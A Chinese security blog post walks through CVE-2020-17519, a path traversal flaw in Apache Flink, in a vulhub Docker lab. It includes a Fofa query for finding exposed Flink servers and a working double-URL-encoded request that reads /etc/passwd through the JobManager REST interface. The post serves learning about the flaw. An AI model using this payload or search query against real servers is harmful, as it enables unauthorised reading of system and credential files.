Apache Flink路径遍历 (CVE-2020-17519)

admin 2022年5月12日23:32:25安全漏洞评论2 views766字阅读2分33秒阅读模式

前言说明:

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。

Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

Fofa语句查询:

 

country="CN" && js_name="runtime.0dcf16aad31edd73d8e8.js"

 

漏洞存在占比大概十分之六(按搜索出的单页面统计)

 

正文:

环境搭建:

我们使用vulhub进行环境搭建,具体漏洞打开目录:

/vulhub-master/flink/CVE-2020-17519


开启命令:

docker-compose up -d

Apache Flink路径遍历 (CVE-2020-17519)

打开成功后访问http://192.168.0.110:8081/#/submit即可红色部分换成你自己的靶机IP

Apache Flink路径遍历 (CVE-2020-17519)

这样即可完成搭建工作

漏洞利用:

利用方式很简单,直接构建poc

http://192.168.0.110:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

IP换成你自己的即可,读取网站中/etc/passwd目录

Apache Flink路径遍历 (CVE-2020-17519)

这里对%252f解释一下,这个是对/进行url编码加密两次后的值

Apache Flink路径遍历 (CVE-2020-17519)

Apache Flink路径遍历 (CVE-2020-17519)

参考文章:

https://vulhub.org/#/environments/flink/CVE-2020-17519/

 

作者:【白】

交流群:70844080

公众号:白安全组

仅供学习研究

有什么问题大家可以在文章下方留言

原文始发于微信公众号(白安全组):Apache Flink路径遍历 (CVE-2020-17519)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日23:32:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Apache Flink路径遍历 (CVE-2020-17519) http://cn-sec.com/archives/997995.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: